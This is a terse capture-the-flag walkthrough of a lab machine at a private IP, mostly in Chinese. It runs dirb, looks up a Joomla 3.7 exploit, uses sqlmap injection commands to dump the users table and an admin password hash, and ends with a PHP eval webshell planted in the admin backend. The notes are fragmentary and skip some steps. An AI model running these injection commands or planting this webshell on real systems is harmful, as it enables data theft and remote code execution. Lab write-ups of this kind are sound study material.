首先明确:《中华人民共和国网络安全法 》
开始
192.168.37.132
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge. :-)
目标 root 权限
同时
dirb http://192.168.37.132 -X .txt
版本 3.7
searchsploit joomla
/usr/share/exploitdb/exploits/php/webapps/42033.txt
复制一份到桌面打开,直接访问可能会出现卡顿
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
192.168.37.132
sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
joomladb库
sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
爆表
sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
192.168.37.132
登录这个页面发现没有什么东西,只能更改编辑这个页面,也就是说应该还有其他地方要用到 admin 的账号,接下来扫目录
扫到
果然是个新的登录窗口
进入后台
目标明确,想要 root 权限,先控制,可以写一句话木马
ASP
<?php
@eval($_REQUEST['Pai'])
?>